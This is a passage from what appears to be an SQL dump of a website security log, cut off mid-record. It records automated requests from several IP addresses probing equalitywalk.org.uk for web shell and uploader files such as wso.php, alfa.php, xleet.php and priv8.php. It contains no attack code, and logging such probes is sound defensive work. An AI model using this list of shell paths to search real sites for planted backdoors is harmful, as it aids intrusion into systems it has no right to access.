1.83.102',2328449894,'',0,1673863860.2025,100,'HF7Zvn5il6O08mqVsNMKbIYa','','13|0|0|0|equalitywalk.org.uk/wp_wrong_datlib.php'),('138.201.83.102',2328449894,'',0,1673863860.3825,100,'e5IrKwAilLf2dUkyDZE1QbR6','','13|0|0|0|equalitywalk.org.uk/2index.php'),('138.201.83.102',2328449894,'',0,1673863860.5489,55,'3wifR0ogNMB8ZPAtxcmvUWuS','','19|0|0|0|equalitywalk.org.uk/autoload_classmap.php'),('138.201.83.102',2328449894,'',0,1673863860.6909,55,'XCFdMj9n8J4GESQDptu7Us3W','','19|0|0|0|equalitywalk.org.uk/wikindex.php'),('138.201.83.102',2328449894,'',0,1673863860.8400,55,'3XdiZg9wNtarvjTQRJBe7u1G','','19|0|0|0|equalitywalk.org.uk/Deadcode1975xxxxxxxxxxxxxxxxxxxxxxxxxxxx.php'),('138.201.83.102',2328449894,'',0,1673863860.9734,55,'41jtBGXsqPlMLNS2xF6RDCfe','','19|0|0|0|equalitywalk.org.uk/1h6j5.php'),('138.201.83.102',2328449894,'',0,1673863861.3292,55,'mOaSDBR8PbYwCHVxhL976UrJ','','19|0|0|0|equalitywalk.org.uk/wp-admin/xleet.php'),('138.201.83.102',2328449894,'',0,1673863861.5675,55,'seSmt5w9UDuOQMPTJbqNKf1j','','19|0|0|0|equalitywalk.org.uk/wp-admin/fx.php'),('138.201.83.102',2328449894,'',0,1673863861.7338,55,'ECRKnGF0sukIm4oHPAX5jMN9','','19|0|0|0|equalitywalk.org.uk/4price.php'),('138.201.83.102',2328449894,'',0,1673863861.8828,55,'jpxeHhvGJVUdMycuOPoNXf9R','','19|0|0|0|equalitywalk.org.uk/utchiha.php'),('138.201.83.102',2328449894,'',0,1673863862.0327,55,'zURgGNP4lCLuapSYjMie9O36','','19|0|0|0|equalitywalk.org.uk/wp-admin/priv8.php'),('138.201.83.102',2328449894,'',0,1673863862.1743,55,'8Tt13KEfoar2cU6GBvdgM0um','','19|0|0|0|equalitywalk.org.uk/wp-admin/rss.php'),('138.201.83.102',2328449894,'',0,1673863862.3655,55,'c52TQkUjFGlWoS3MaHXr6yi7','','19|0|0|0|equalitywalk.org.uk/uploads/xleet.php'),('138.201.83.102',2328449894,'',0,1673863862.6295,100,'JvePLTIk75iXrFsoqbj0pD8w','','13|0|0|0|equalitywalk.org.uk/upload.php'),('138.201.83.102',2328449894,'',0,1673863862.7915,55,'BRxmdZ4kNQL8VUpaWYvPyTMg','','19|0|0|0|equalitywalk.org.uk/about.php'),('138.201.83.102',2328449894,'',0,1673863862.9237,100,'q9ovJCDH3VAMBlN80jPLuc5y','','13|0|0|0|equalitywalk.org.uk/wp-includes/customize/class-wp-customize-nav-menu.php'),('138.201.83.102',2328449894,'',0,1673863863.0636,55,'rMIYk7BiHZau9XE18x32vq0n','','19|0|0|0|equalitywalk.org.uk/ALFA_DATA/alfacgiapi/ups.php'),('138.201.83.102',2328449894,'',0,1673863863.2090,55,'2JxQfRpCnr3Zj9PUYcb5hXAS','','19|0|0|0|equalitywalk.org.uk/3index.php'),('138.201.83.102',2328449894,'',0,1673863863.3945,55,'4gtG0EpPUrl2STJKoZWw5HYc','','19|0|0|0|equalitywalk.org.uk/alfa.php'),('138.201.83.102',2328449894,'',0,1673863863.5523,55,'m7Kui0F9kUvdLj6Ms4PB5hfC','','19|0|0|0|equalitywalk.org.uk/old-index.php'),('138.201.83.102',2328449894,'',0,1673863863.6966,55,'9Pr0JMA4sOkacdSqLG25F1oU','','19|0|0|0|equalitywalk.org.uk/baindex.php'),('138.201.83.102',2328449894,'',0,1673863863.8382,55,'QzIE6dMh2gn8B3CNcY09uKmi','','19|0|0|0|equalitywalk.org.uk/wikindex.php'),('138.201.83.102',2328449894,'',0,1673863864.0001,55,'On6N8viJYX9rudKBwTMHlthI','','19|0|0|0|equalitywalk.org.uk/doc.php'),('138.201.83.102',2328449894,'',0,1673863864.1511,55,'gXfx4eJ3scZjivlt9NrHq7IV','','19|0|0|0|equalitywalk.org.uk/haxor.php'),('138.201.83.102',2328449894,'',0,1673863864.3246,55,'pWF0OkrNo6atZPuTDjKy1Y4I','','19|0|0|0|equalitywalk.org.uk/marijuana.php'),('138.201.83.102',2328449894,'',0,1673863864.5428,55,'N1OkuaqwMsEUpSoArj7dXWlf','','19|0|0|0|equalitywalk.org.uk/mass.php'),('138.201.83.102',2328449894,'',0,1673863864.6826,55,'rZS0J48u73cDybEFBa6wAKpg','','19|0|0|0|equalitywalk.org.uk/mini.php'),('138.201.83.102',2328449894,'',0,1673863864.8347,55,'MLhfQcnglsrF4XdNTA3jIJ71','','19|0|0|0|equalitywalk.org.uk/priv8.php'),('138.201.83.102',2328449894,'',0,1673863865.0429,55,'TFOL65PBtHR34V17SYpGavEr','','19|0|0|0|equalitywalk.org.uk/shell.php'),('138.201.83.102',2328449894,'',0,1673863865.1937,55,'OkH1vrmc4DNlQi7CsGn5VoUt','','19|0|0|0|equalitywalk.org.uk/small.php'),('138.201.83.102',2328449894,'',0,1673863865.3735,55,'ZmJSoAFtbfrEBN0YcykHuPxs','','19|0|0|0|equalitywalk.org.uk/wso.php'),('138.201.83.102',2328449894,'',0,1673863865.5280,55,'8Hn3XuqVvCw5mMizDtIyLYTb','','19|0|0|0|equalitywalk.org.uk/mininew.php'),('138.201.83.102',2328449894,'',0,1673863865.6760,55,'W3PUXVJCdMHwmBlt79KnhyIs','','19|0|0|0|equalitywalk.org.uk/xleet.php'),('138.201.83.102',2328449894,'',0,1673863865.8189,55,'547UqMED8ghIej6mryHokuYt','','19|0|0|0|equalitywalk.org.uk/1337.php'),('138.201.83.102',2328449894,'',0,1673863865.9871,55,'nYTqPzB9xKdFfLtApecDvVE1','','19|0|0|0|equalitywalk.org.uk/wxo.php'),('138.201.83.102',2328449894,'',0,1673863866.1360,55,'oXlIJdVGDFZ3y9QnMR0c1awi','','19|0|0|0|equalitywalk.org.uk/wp-info.php'),('138.201.83.102',2328449894,'',0,1673863866.2798,55,'Nszv2m715dSyPKWD9gat0fRu','','19|0|0|0|equalitywalk.org.uk/up-kon.php'),('138.201.83.102',2328449894,'',0,1673863866.4178,55,'lvamp4GOrkcDW0ed2guBEyi7','','19|0|0|0|equalitywalk.org.uk/hehe.php'),('138.201.83.102',2328449894,'',0,1673863866.5518,100,'Qf6WbVU0KSyHciLlmN3IhRMp','','13|0|0|0|equalitywalk.org.uk/3x.php'),('138.201.83.102',2328449894,'',0,1673863866.6954,55,'Qg6wmbXRS3UJOhsuKLTYEWeP','','19|0|0|0|equalitywalk.org.uk/xmlrqc.php'),('138.201.83.102',2328449894,'',0,1673863866.8361,55,'Vl1Ma4GfviIr3sBERqK0xF9g','','19|0|0|0|equalitywalk.org.uk/wp-blog.php'),('138.201.83.102',2328449894,'',0,1673863867.0467,55,'3Mw8W2gi09uelAhVNxnRmDKQ','','19|0|0|0|equalitywalk.org.uk/xwxx.php'),('138.201.83.102',2328449894,'',0,1673863867.2372,55,'xyD82Em9oli1dfruBjgHOQI7','','19|0|0|0|equalitywalk.org.uk/wp-x.php'),('138.201.83.102',2328449894,'',0,1673863867.3920,55,'t5zPl4pQryUebfVRKOxhHCZI','','19|0|0|0|equalitywalk.org.uk/xl.php'),('138.201.83.102',2328449894,'',0,1673863867.5897,55,'ZYGsPEi15pzRa7JASHmLu6vy','','19|0|0|0|equalitywalk.org.uk/wp-god.php'),('138.201.83.102',2328449894,'',0,1673863867.8389,55,'mK26fGwtZF1nB9zrxElSYb7Q','','19|0|0|0|equalitywalk.org.uk/wp-easy.php'),('138.201.83.102',2328449894,'',0,1673863868.0679,100,'fKD40lAaGItndZVbNeS2hjCu','','13|0|0|0|equalitywalk.org.uk/DKIZ.php'),('138.201.83.102',2328449894,'',0,1673863868.3017,55,'lh5DZR1Ape7vqt4N8z3uFms6','','19|0|0|0|equalitywalk.org.uk/pi.php'),('138.201.83.102',2328449894,'',0,1673863868.4780,55,'BlK5LdnhYEP8oTzmt3sRFcjJ','','19|0|0|0|equalitywalk.org.uk/wp-includes/assets/pi.php'),('138.201.83.102',2328449894,'',0,1673863868.6474,55,'WdejoUml6fZI2FqQxKgNScBT','','19|0|0|0|equalitywalk.org.uk/XxX.php'),('138.201.83.102',2328449894,'',0,1673863868.7794,55,'gmDIfnqsHUwEzNM378ty21Zi','','19|0|0|0|equalitywalk.org.uk/new-index.php'),('138.201.83.102',2328449894,'',0,1673863868.9050,55,'4PK5WGiwhFXQB6LxbquHCJsz','','19|0|0|0|equalitywalk.org.uk/xml.php'),('138.201.83.102',2328449894,'',0,1673863869.0497,55,'4r7gQL0F85isUT9cBSVONJyu','','19|0|0|0|equalitywalk.org.uk/wp_logx.php'),('138.201.83.102',2328449894,'',0,1673863869.2330,55,'07GQguMZAaYelWHCVIBEhUwK','','19|0|0|0|equalitywalk.org.uk/crypted.php'),('138.201.83.102',2328449894,'',0,1673863869.3751,55,'A8leaUvZwHNmqFhK4EVzrsiu','','19|0|0|0|equalitywalk.org.uk/wpx.php'),('138.201.83.102',2328449894,'',0,1673863869.5199,55,'Dw3vuVYkmLasQRd1bEOJ8tNy','','19|0|0|0|equalitywalk.org.uk/ini.php'),('138.201.83.102',2328449894,'',0,1673863869.6601,55,'t9lxUMNIzwCqchWsOepLnauB','','19|0|0|0|equalitywalk.org.uk/xx.php'),('138.201.83.102',2328449894,'',0,1673863869.8327,55,'tgcodJXPihL9CE1uQSvanZ7H','','19|0|0|0|equalitywalk.org.uk/reminder.php'),('138.201.83.102',2328449894,'',0,1673863870.0210,55,'oUwTfIGFRprvYqkOePW5bN8Q','','19|0|0|0|equalitywalk.org.uk/image/screenshot_1.php'),('138.201.83.102',2328449894,'',0,1673863870.2525,55,'jGqin1IHSPNybTDWKuphUfxR','','19|0|0|0|equalitywalk.org.uk/screenshot_1.php'),('138.201.83.102',2328449894,'',0,1673863870.3891,55,'wHiYP4MEBhTasSAfbp2zL7I8','','19|0|0|0|equalitywalk.org.uk/mad.php'),('138.201.83.102',2328449894,'',0,1673863870.5253,55,'pmoIuSRNZatW8wbJyXxYi2OP','','19|0|0|0|equalitywalk.org.uk/admin/controller/extension/wpm.php'),('138.201.83.102',2328449894,'',0,1673863870.6727,55,'eOcAfh8LJD1IkmxsngtQdbPS','','19|0|0|0|equalitywalk.org.uk/xlt.php'),('138.201.83.102',2328449894,'',0,1673863870.8071,55,'XEB2WeVgvlS8DRFtmdLOzyMN','','19|0|0|0|equalitywalk.org.uk/xl.php'),('138.201.83.102',2328449894,'',0,1673863870.9431,55,'sFUdEeW52Tgb19vchDu4qY86','','19|0|0|0|equalitywalk.org.uk/lufix.php'),('138.201.83.102',2328449894,'',0,1673863871.0825,55,'bCOoAFG9Tl7s5mpJYVzRdywH','','19|0|0|0|equalitywalk.org.uk/uploads/up.php'),('138.201.83.102',2328449894,'',0,1673863871.2495,55,'pYlSwh6xVqZoeHjn1KdIXCsJ','','19|0|0|0|equalitywalk.org.uk/images/vuln.php'),('138.201.83.102',2328449894,'',0,1673863871.4240,55,'RvgYXDtZqKUAwrV2WL3od7CF','','19|0|0|0|equalitywalk.org.uk/up.php'),('138.201.83.102',2328449894,'',0,1673863871.5637,55,'kVbg54J8asmNWDEKr3e70Ifh','','19|0|0|0|equalitywalk.org.uk/media-admin.php'),('138.201.83.102',2328449894,'',0,1673863871.7049,55,'wJB6CjAHnVT0zrXhxgS2ckEQ','','19|0|0|0|equalitywalk.org.uk/1index.php'),('138.201.83.102',2328449894,'',0,1673863871.8529,55,'ntxO8gD2z0ybuYGST63Zs5VI','','19|0|0|0|equalitywalk.org.uk/payout.php'),('138.201.83.102',2328449894,'',0,1673863872.0531,55,'8j0YrKeJRGFH4EM72vL1XCNU','','19|0|0|0|equalitywalk.org.uk/google.php'),('138.201.83.102',2328449894,'',0,1673863872.2008,55,'4KxNc7PCzGwO32re0aBbsU1A','','19|0|0|0|equalitywalk.org.uk/srx.php'),('138.201.83.102',2328449894,'',0,1673863872.3413,55,'0rXZiyELCVT4s9qz7kcMoB8Q','','19|0|0|0|equalitywalk.org.uk/x.php'),('138.201.83.102',2328449894,'',0,1673863872.4878,55,'JLmAiHz9DfIWOdlbBFxgZ4RX','','19|0|0|0|equalitywalk.org.uk/upload.php'),('138.201.83.102',2328449894,'',0,1673863872.6451,55,'xD1WwopsAh3j09GJvXEqHKY7','','19|0|0|0|equalitywalk.org.uk/ups.php'),('20.244.36.78',351544398,'',0,1673869269.6706,55,'4vF9q75emR1GzX3krxQAWc06','','19|0|0|0|www.equalitywalk.org.uk/style.php'),('20.244.36.78',351544398,'',0,1673869270.4093,55,'i714pFI8dbyMhBmvCxwHg5TZ','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/style.php'),('20.244.36.78',351544398,'',0,1673869271.3435,55,'M5RvPz8o3Ac2dktiVyspgaC9','','19|0|0|0|www.equalitywalk.org.uk/s_e.php'),('20.244.36.78',351544398,'',0,1673869272.3314,55,'p6mZxYjf05WR1ElqcX3uQVI8','','19|0|0|0|www.equalitywalk.org.uk/s_ne.php'),('20.244.36.78',351544398,'',0,1673869273.4377,55,'SE3xmI7tA2qrGDcdRJMoHz9v','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('20.244.36.78',351544398,'',0,1673869273.5548,10,'SE3xmI7tA2qrGDcdRJMoHz9v','','707|0|0|0|www.equalitywalk.org.uk/1index.php'),('20.244.36.78',351544398,'',0,1673869274.4674,55,'r5AgJeu2w1LsiFzW6MNBlXyK','','19|0|0|0|www.equalitywalk.org.uk/radio.php'),('20.244.36.78',351544398,'',0,1673869275.4003,55,'8XgQtf2Z4yOzl9ukDIh06n1L','','19|0|0|0|www.equalitywalk.org.uk/doc.php'),('20.244.36.78',351544398,'',0,1673869276.3220,55,'JibYZPXlU7qGh62Ntg5KMmLf','','19|0|0|0|www.equalitywalk.org.uk/wp_wrong_datlib.php'),('20.244.36.78',351544398,'',0,1673869277.2944,55,'Dqp93kAlvnmWe0RNctfQwsUJ','','19|0|0|0|www.equalitywalk.org.uk/beence.php'),('20.244.36.78',351544398,'',0,1673869278.2190,55,'ZrvQMJmh1W9FLx4Yeg873aot','','19|0|0|0|www.equalitywalk.org.uk/ups.php'),('20.244.36.78',351544398,'',0,1673869279.1786,100,'qn0AKP2CkwtJvOdVlEyS4ux6','','13|0|0|0|www.equalitywalk.org.uk/wp-signin.php'),('20.244.36.78',351544398,'',0,1673869280.1088,55,'tS7v8p4JhsCrOfYHR2EaBx5I','','19|0|0|0|www.equalitywalk.org.uk/media-admin.php'),('20.244.36.78',351544398,'',0,1673869281.0916,55,'vUKymRrWVY94MINaDgOFqxw0','','19|0|0|0|www.equalitywalk.org.uk/export.php'),('20.244.36.78',351544398,'',0,1673869282.5311,55,'HdOaksupwUIeMCx2PRYNL8BA','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('20.244.36.78',351544398,'',0,1673869283.4304,55,'IgblTyGLa6xhAuH3rSwW8kF0','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-atom.php'),('20.244.36.78',351544398,'',0,1673869284.3472,55,'gFTl7SzO6XHpN3tQEjqP9inK','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/images/css.php'),('20.244.36.78',351544398,'',0,1673869284.7779,55,'XdlKRf0CvJksAQB16qYZa2mS','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('20.244.36.78',351544398,'',0,1673869285.7046,55,'QFUw7MAbGzOpJYsLV0r8E4m6','','19|0|0|0|www.equalitywalk.org.uk/defau1t.php'),('20.244.36.78',351544398,'',0,1673869286.6400,55,'xODrHMSaQ0w14tUWYEe8gVCR','','19|0|0|0|www.equalitywalk.org.uk/moduless.php'),('20.244.36.78',351544398,'',0,1673869287.5796,55,'8iA1Rmre9V3lv0QqZctJ2zFL','','19|0|0|0|www.equalitywalk.org.uk/wp-booking.php'),('20.244.36.78',351544398,'',0,1673869290.9958,55,'RnACX8qYoEaFS0iycWekMgZO','','19|0|0|0|www.equalitywalk.org.uk/config.bak.php'),('20.244.36.78',351544398,'',0,1673869292.3736,55,'iHBoh0mGaEwWQulcJrXOkfze','','19|0|0|0|www.equalitywalk.org.uk/legion.php'),('20.244.36.78',351544398,'',0,1673869298.4388,55,'TNKbwPyoRYl3ka5DgJhdtCEn','','19|0|0|0|www.equalitywalk.org.uk/wp-plugins.php'),('20.244.36.78',351544398,'',0,1673869299.4874,55,'UF6CHZ0VI9xm4dfT52yhq3vR','','19|0|0|0|www.equalitywalk.org.uk/gank.php.PhP'),('20.244.36.78',351544398,'',0,1673869301.2188,55,'ga3MACcqtepEkYQVuoiLmj5z','','19|0|0|0|www.equalitywalk.org.uk/archives.php'),('20.244.36.78',351544398,'',0,1673869302.1553,55,'g1BHQjXxwOn2euTzSmWaLokb','','19|0|0|0|www.equalitywalk.org.uk/defau11.php'),('20.244.36.78',351544398,'',0,1673869304.0893,100,'QKpXVDkfGMULwZIicW0gSBql','','13|0|0|0|www.equalitywalk.org.uk/system_log.php'),('20.244.36.78',351544398,'',0,1673869305.4278,55,'rjIzgF204Qna8YXVJ5AxypS1','','19|0|0|0|www.equalitywalk.org.uk/wp-backup-sql-302.php'),('20.244.36.78',351544398,'',0,1673869306.4597,100,'usKTGhxB5PZbC2yqpt0A8YwN','','13|0|0|0|www.equalitywalk.org.uk/error.php'),('20.244.36.78',351544398,'',0,1673869361.1234,100,'vH7iU289YRDgcB0be5Ma43r1','','13|0|0|0|www.equalitywalk.org.uk/index.php'),('20.244.36.78',351544398,'',0,1673869361.5399,55,'PWf0O9UeTnMjxuYlk1AazyQE','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('20.244.36.78',351544398,'',0,1673869361.9317,55,'GAyK6L7akieQnsocgHU9XWdr','','19|0|0|0|www.equalitywalk.org.uk/xleet.php'),('20.244.36.78',351544398,'',0,1673869362.3445,55,'YTdm02MZ8HcxNCbp1zGK4QwV','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('20.244.36.78',351544398,'',0,1673869362.7362,55,'TlA9XNo1srJHnpVcS7YzqLfE','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('20.244.36.78',351544398,'',0,1673869363.1342,55,'aYhUDrnlpbSoWLKOkcqGHEeM','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('20.244.36.78',351544398,'',0,1673869363.5281,55,'xALfEgGwH8R17jD6CXOY2s5B','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('20.244.36.78',351544398,'',0,1673869363.9336,55,'nsyEJiuh3DKwr9GgjYbUFRBc','','19|0|0|0|www.equalitywalk.org.uk/1.php'),('20.244.36.78',351544398,'',0,1673869364.3347,55,'76BrzFWa4NxtPZRGwlmUX5MD','','19|0|0|0|www.equalitywalk.org.uk/x.php'),('20.244.36.78',351544398,'',0,1673869364.7435,55,'AWO1ejzJoQ2iCvqDnfNwE8Tt','','19|0|0|0|www.equalitywalk.org.uk/z.php'),('20.244.36.78',351544398,'',0,1673869365.1597,55,'jWwDsM3GobJtEzReASTq0dxp','','19|0|0|0|www.equalitywalk.org.uk/a.php'),('20.244.36.78',351544398,'',0,1673869365.5885,55,'JB6cdLkDNU7XlFhinRfsz94v','','19|0|0|0|www.equalitywalk.org.uk/test.php'),('20.244.36.78',351544398,'',0,1673869366.0872,55,'kHWFXvxTijoJpt2PGDIACLYd','','19|0|0|0|www.equalitywalk.org.uk/wp.php'),('20.244.36.78',351544398,'',0,1673869366.5580,55,'eyGMQRlzdfXLgs06YtK38h2F','','19|0|0|0|www.equalitywalk.org.uk/alfa.php'),('20.244.36.78',351544398,'',0,1673869367.0800,55,'5EpDNAMxGuCgUecK9S6VlXtd','','19|0|0|0|www.equalitywalk.org.uk/config.php'),('20.244.36.78',351544398,'',0,1673869367.4787,55,'mJD62BSIN4vw0lhqrtu7kOCy','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/index.php'),('20.244.36.78',351544398,'',0,1673869367.9318,55,'b6VEegqCDuyKNB937ld2mwOQ','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('20.244.36.78',351544398,'',0,1673869368.3442,55,'SIegOF7siCHwUBnkQ9VXz3p5','','19|0|0|0|www.equalitywalk.org.uk/shells.php'),('51.142.189.28',864992540,'',0,1673877672.9366,55,'MupGTNQlIdciWXBPkagUb1xo','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('20.165.29.249',346365433,'',0,1673877865.6202,55,'SNFDsfnhPq79VpOmZizvjoGJ','','19|0|0|0|www.equalitywalk.org.uk/style.php'),('20.165.29.249',346365433,'',0,1673877866.0856,55,'5m4QryPngLUjbqpXcNG1fuxO','','19|0|0|0|www.equalitywalk.org.uk/wp-admin/style.php'),('20.165.29.249',346365433,'',0,1673877867.2077,55,'75rwnVfv4CgTbijzeU8XZpDL','','19|0|0|0|www.equalitywalk.org.uk/s_e.php'),('20.165.29.249',346365433,'',0,1673877868.3634,55,'6plsG0uCzn4V5fh7kqFwUYTO','','19|0|0|0|www.equalitywalk.org.uk/s_ne.php'),('20.165.29.249',346365433,'',0,1673877869.4780,55,'XsRT3rGJSz7K6F1IcxtY2LBE','','19|0|0|0|www.equalitywalk.org.uk/1index.php'),('20.165.29.249',346365433,'',0,1673877869.5565,10,'XsRT3rGJSz7K6F1IcxtY2LBE','','707|0|0|0|www.equalitywalk.org.uk/1index.php'),('20.165.29.249',346365433,'',0,1673877870.5943,55,'8QvXa7KMRJHBVi5wrotdUzeb','','19|0|0|0|www.equalitywalk.org.uk/radio.php'),('20.165.29.249',346365433,'',0,1673877873.8354,55,'YDFsIxjpVP7OuvMULwe8caN0','','19|0|0|0|www.equalitywalk.org.uk/doc.php'),('20.165.29.249',346365433,'',0,1673877875.8085,55,'OJAy7daLN4j65FmIMlu3srEk','','19|0|0|0|www.equalitywalk.org.uk/wp_wrong_datlib.php'),('20.165.29.249',346365433,'',0,1673877876.9437,55,'MEfvmt3ozshRIUrDNFYSncG8','','19|0|0|0|www.equalitywalk.org.uk/beence.php'),('20.165.29.249',346365433,'',0,1673877878.0876,55,'aURHG6YkcDAwI8n0xF1N4C7P','','19|0|0|0|www.equalitywalk.org.uk/ups.php'),('20.165.29.249',346365433,'',0,1673877879.9191,100,'vbRfXskn57Ua6gGrtPl4VizK','','13|0|0|0|www.equalitywalk.org.uk/wp-signin.php'),('20.165.29.249',346365433,'',0,1673877881.0757,55,'p3thOQCRAfTE0xUBdI7MrHln','','19|0|0|0|www.equalitywalk.org.uk/media-admin.php'),('20.165.29.249',346365433,'',0,1673877882.3367,55,'eq6hdaW3zCyMfJDAFOkYHT5V','','19|0|0|0|www.equalitywalk.org.uk/export.php'),('20.165.29.249',346365433,'',0,1673877884.6495,55,'f4IvGjQVMLCmFODKJelsoScE','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-class.php'),('20.165.29.249',346365433,'',0,1673877885.9244,55,'oE2CWavRk9uwq0J7GxQ1yfVZ','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/wp-atom.php'),('20.165.29.249',346365433,'',0,1673877887.1245,55,'58xRi9h1LmQDWBqtTVJCgMp2','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/images/css.php'),('20.165.29.249',346365433,'',0,1673877887.5969,55,'ehQYFUHLtCZfN6x514KGuzOo','','19|0|0|0|www.equalitywalk.org.uk/wp-includes/css/css.php'),('20.165.29.249',346365433,'',0,1673877888.7918,55,'8HsuVazARYDo9XIJ5y2pTheP','','19|0|0|0|www.equalitywalk.org.uk/defau1t.php'),('20.165.29.249',346365433,'',0,1673877890.0687,55,'QokB81VZNSxqgtiyu64YdAJa','','19|0|0|0|www.equalitywalk.org.uk/moduless.php'),('20.165.29.249',346365433,'',0,1673877891.3464,55,'KX9gZDfCb63eNIYG4ivn5jSH','','19|0|0|0|www.equalitywalk.org.uk/wp-booking.php'),('20.165.29.249',346365433,'',0,1673877899.2005,55,'ZGklbxPm0c3FzhBMiA7d82DX','','19|0|0|0|www.equalitywalk.org.uk/config.bak.php'),('20.165.29.249',346365433,'',0,1673877900.6078,55,'tSPGKLQHeki20NfhAOFr53n7','','19|0|0|0|www.equalitywalk.org.uk/legion.php'),('20.165.29.249',346365433,'',0,1673877902.8644,55,'1pBVSXm7O40JANWry2qI3fCe','','19|0|0|0|www.equalitywalk.org.uk/wp-plugins.php'),('20.165.29.249',346365433,'',0,1673877904.1313,55,'xYEQfgqj1b0CNz4Du9nhF8rl','','19|0|0|0|www.equalitywalk.org.uk/gank.php.PhP'),('20.165.29.249',346365433,'',0,1673877906.4879,55,'iGOfM0HjJeENaoFB8RmgLIbc','','19|0|0|0|www.equalitywalk.org.uk/archives.php'),('20.165.29.249',346365433,'',0,1673877907.5850,55,'cGKvYAI7xSROByEV481phrN0','','19|0|0|0|www.equalitywalk.org.uk/defau11.php'),('20.165.29.249',346365433,'',0,1673877909.8503,100,'DjeFtVz5lfOI0oi9AUguNRCk','','13|0|0|0|www.equalitywalk.org.uk/system_log.php'),('20.165.29.249',346365433,'',0,1673877910.9608,55,'rKGj7dUe3f2RJCvq6BLSEYp9','','19|0|0|0|www.equalitywalk.org.uk/wp-backup-sql-302.php'),('20.165.29.249',346365433,'',0,1673877912.3045,100,'QRlODkSoEM3VKH5LvnUc8w17','','13|0|0|0|www.equalitywalk.org.uk/error.php'),('20.165.29.249',346365433,'',0,1673877949.9075,100,'Kd6TfPkten5mEvD7xiB1lgHR','','13|0|0|0|www.equalitywalk.org.uk/index.php'),('20.165.29.249',346365433,'',0,1673877950.5268,55,'KQbHpsICXf21Dnzi6AmOqvad','','19|0|0|0|www.equalitywalk.org.uk/olux.php'),('20.165.29.249',346365433,'',0,1673877950.9387,55,'uqnlb9LM85esrQBSIhNRovmd','','19|0|0|0|www.equalitywalk.org.uk/xleet.php'),('20.165.29.249',346365433,'',0,1673877951.3368,55,'8QpUokl4JVyjRbKZxIN92mY1','','19|0|0|0|www.equalitywalk.org.uk/wso.php'),('20.165.29.249',346365433,'',0,1673877951.7689,55,'HkT860gIQv5uEVlCcJnROYZp','','19|0|0|0|www.equalitywalk.org.uk/shell.php'),('20.165.29.249',346365433,'',0,1673877952.1802,55,'tRCv9JOs4YaVPkmXhDqLyW8u','','19|0|0|0|www.equalitywalk.org.uk/up.php'),('20.165.29.249',346365433,'',0,1673877952.7734,55,'6ejXUfp0QGrI93OnlwxHPWFm','','19|0|0|0|www.equalitywalk.org.uk/upload.php'),('20.165.29.249',346365433,'',0,1673877953.3743,55,'LEq123pXSjaPdmb5GJCVltMc','','19|0|0|0|www.equalitywalk.org.uk/1.php'),('20.165.29.249',346365433,'',0,1673877953.8958,55,'WIUt9waRj3mne0EqDuJYOdi4','','19|0|0|0|www.equalitywalk.org.uk/x.php'),('20.165.29.249',346365433,'',0,1673877954.4310,55,'qZKxJQuk3Af6Y9HXW0POw1cV','','19|0|0|0|www.equalitywalk.org.uk/z.php'),('20.165.29.249',346365433,'',0,1673877954.9360,55,'Y6pVjmU0kG8oSDiewZnxCHRb','','19|0|0|0|www.equalitywalk.org.uk/a.php'),('20.165.29.249',346365433,'',0,1673877955.5071,55,'Bl2p49Cvd1n5ETRr0QJXZghG','','19|0|0|0|www.equalitywalk.org.uk/test.php'),('20.165.29.249',346365433,'',0,1673877956.1262,55,'fGRFVuXbEZz7lBC1Pr3xho5S','','19|0|0|0|www.equalitywalk.org.uk/wp.php'),('20.165.29.249',346365433,'',0,1673877956.6705,55,'xXP5AlNhsDvKrZOEmbcWH93C','','19|0|0|0|www.equalitywalk.org.uk/alfa.php'),('20.165.29.249',346365433,'',0,1673877957.2258,55,'7ZCNiqTVeGrxhBtk1JnOlXbE','','19|0|0|0|www.equalitywalk.org.uk/config.php'),('20.165.29.249',346365433,'',0,1673877957.7343,55,'KS5DeahT7ojO2BgUmx6MPFHI','','19|0|0|0|www.equalitywalk.org.uk/templates/beez3/index.php'),('20.165.29.249',346365433,'',0,1673877958.2347,55,'ul30yBkvjfML8TEQZxXSncCa','','19|0|0|0|www.equalitywalk.org.uk/about.php'),('20.165.29.249',346365433,'',0,1673877958.6794,55,'r1oswAYDvf3LmxuiJnp6SMNU','','19|0|0|0|www.equalitywalk.org.uk/shells.php'),('196.118.14.220',3296071388,'',0,1673888017.3770,55,'H7TyXVmJYKuI65ZctjOfis8Q','','19|0|0|0|equalitywalk.org.uk/wso.php'),('196.118.14.220',3296071388,'',0,1673888017.7003,55,'4sXdtYKB6w9u3AURTCjnFram','','19|0|0|0|equalitywalk.org.uk/xxx.php'),('196.118.14.220',3296071388,'',0,1673888018.7542,55,'BVdOKTpo83kGZiLANzJ5F9Uh','','19|0|0|0|equalitywalk.org.uk/x.php'),('196.118.14.220',3296071388,'',0,1673888019.0362,55,'mLvyuqkot06AFeBDHwUfP7dZ','','19|0|0|0|equalitywalk.org.uk/new.php'),('196.118.14.220',3296071388,'',0,1673888019.2563,55,'0fcJUXZwC2OYHzS8RBhI4FT1','','19|0|0|0|equalitywalk.org.uk/shell.php'),('196.118.14.220',3296071388,'',0,1673888019.3062,10,'0fcJUXZwC2OYHzS8RBhI4FT1','','707|0|0|0|equalitywalk.org.uk/shell.php'),('196.118.14.220',3296071388,'',0,1673888019.7424,55,'tHRCWTxzyEfslD4cwkq3eoY7','','19|0|0|0|equalitywalk.org.uk/alpha.php'),('196.118.14.220',3296071388,'',0,1673888019.9922,55,'gWvZat9sOUprVy57MwfQDGnz','','19|0|0|0|equalitywalk.org.uk/mailer.php'),('196.118.14.220',3296071388,'',0,1673888020.2513,55,'ryLRAPVSGoabFxvIM798Cz5q','','19|0|0|0|equalitywalk.org.uk/send.php'),('196.118.14.220',3296071388,'',0,1673888020.8388,55,'X8ZKsuYJrUaA